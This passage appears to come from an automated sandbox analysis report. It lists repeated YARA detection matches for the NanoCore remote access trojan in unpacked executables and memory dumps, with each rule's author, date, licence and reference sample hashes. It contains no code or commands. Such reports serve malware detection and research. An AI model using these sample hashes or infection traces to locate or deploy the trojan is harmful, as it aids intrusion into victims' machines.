      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
